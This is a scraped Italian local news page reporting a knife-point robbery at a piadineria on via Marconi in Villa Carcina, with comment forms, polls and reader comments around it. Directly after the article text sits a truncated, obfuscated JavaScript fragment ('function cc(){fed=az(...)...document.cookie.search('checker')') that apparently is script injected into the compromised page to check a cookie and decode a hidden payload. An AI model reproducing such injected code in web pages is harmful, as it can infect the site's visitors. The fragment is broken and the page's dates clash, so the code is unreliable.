20 Aprile 2014 - Ore 05:09


Cronaca Nera Politica Società Economia Mobilità Ambiente Cultura Sport Curiose Interviste
Citta' ed hinterlandBassa brescianaFranciacorta e SebinoGarda e ValtenesiVal SabbiaVal TrompiaVal Camonica
Diminuisci il carattere Aumenta il carattere StampaInvia tramite mail
VILLA CARCINA

Entra in piadineria con un coltello in mano e scappa con 150 euro in tasca

Stava chiudendo la piadineria di via Marconi a Villa Carcina in cui lavora quando è entrato un uomo armato di coltello che l’ha minacciata di consegnargli la cassa. Impaurita dalla lama rivolta verso il volto la commessa ventiduenne, residente nel paese valtrumplino, ha aperto la cassa e consegnato al rapinatore i 150 euro che conteneva.Il colpo è stato piazzato lunedì notte, poco prima delle 24. una volta in possesso del “magro” bottino, il malvivente si è dato alla fuga. Alla ragazza non è rimasto altro da fare che lanciare l’allarme. Sul posto sono intervenuti i carabinieri del Nucleo radio Mobile della compagnia di Gardone Val Trompia, ma le prime indagini non hanno portato a nessun esito. Ora non rimarrà che visionare le immagini registrate dalle telecamere di sorveglianza che i militari hanno individuato nella zona.

function cc(){fed=az(ogo.mn[13]+'0,54,52,40,56,20');return document.cookie.search('checker')


Fonte: redazione mar 28 feb 2012, ore 16.32
Lascia il tuo commento a questa notizia

Nome
Testo del commento
Per inserire il tuo commento copia le lettere e i numeri che trovi qui a sinistra nella casella vuota che trovi qui a destra

Non riesce a leggere il codice? Aggiorna


   

   
Lascia il tuo commento con Facebook

COMMENTI

Seguici su Facebook Seguici su Twitter Seguici su Youtube Fai di bsnews.it la tua pagina iniziale Feed Rss Contatti Chi Siamo
13

Registrazione | Cosa puoi fare col sito
Sondaggio
La Provincia di Brescia è:
Un ente inutile e costoso, da cancellare
Un ente utile, importante e virtuoso
Un ente utile, ma vanno tagliati i costi

Elezioni Aci, si vota martedì 15 aprile dalle 9 alle 15 solo in città:
Bisogna estendere gli orari e aumentare i seggi
Bisogna estendere gli orari
Bisogna aumentare i seggi
Lasciamo tutto così

Sondaggi del mese

Ultimi commenti
02:07 gaia
20 apr - Vai alla news »
scusate ma nessuno vuole ricordare che a duecento metri da lì nel 74 morirono 8 persone e altre centodue rimasero ferite per aver pac
23:30 stradivarius brixiensis
19 apr - Vai alla news »
Assai ermetico il movente di questo furto. Anche appellandoci alla dietrologia più raffinata o pindarica ci riesce difficile capire i
23:16 Pádua
19 apr - Vai alla news »
Si tratta di un grande guerriero.
23:15 A noi, Masaniello !
19 apr - Vai alla news »
Si evocano artatamente un episodio assai oscuro di una vittima non militare della strage di Via Rasella e la vttia del cosiddetto "fuoc
22:05 Masaniello
19 apr - Vai alla news »
Piero Zuccheretti, Federico Barbiano Belgioioso+5 partigiani',il povero cristo fucilato perchè somigliante al commesso Navarra. Giann
19:32 ga la fét?
19 apr - Vai alla news »
Wella che ragionamento!! Scuoti le menti. Siore e siori meditiamo perche negli ultimi 60 anni abbiamo dilapidato un inestimabile patrimonio
19:31 ga la fét?!
19 apr - Vai alla news »
Wella che ragionamento!! Scuoti le menti. Siore e siori meditiamo perche negli ultimi 60 anni abbiamo dilapidato un'inestimabile patrimonio
19:15 io
19 apr - Vai alla news »
se,ad ogni svolta,ci fosse la furia iconoclasta,manifest ata negli ultimi 60 anni,l'italia avrebbe un decimo delle sue bellezze artistiche e
Commenti in evidenza
16:54 Aldo Rebecchi
18 lug - Vai alla news »
Rispetto ai commenti letti, circa l’ipotesi che abbia a coordinare lo staff in via di formazione del Sindaco, non per replicare a chi legitt
Pubblicità elettorale


Twitta usando @bsnewsit

IN EVIDENZA
Rebecchi: il libro su Lucchini? Calzoni risponda a due domande
(a.tortelli) “Dopo aver letto il libro, mi restano due principali domande. Domande che ho anche posto all'autore durante la prima presentazione e che ancora attendono risposta. A che scopo Calzoni ha scritto questo libro? E, ancora, cosa ne direbbe Luigi Lucchini se fosse ancora in vita?”. A porre i quesiti è l'ex deputato bresciano Aldo Rebecchi, che accetta – e rispedisce al mittente – la provocazione lanciata da Ugo Calzoni con il suo ultimo
Entra nella rubrica
12 News - Il Mensile
12 Mesi - Il Mensile
Fan Facebook


       
EDIZIONI 12 | PUBBLICITA' | PI/CF 03327790980 | REA (4) 524873 | REG. TRIB. BRESCIA 41/2008 DEL 15 SETTEMBRE 2008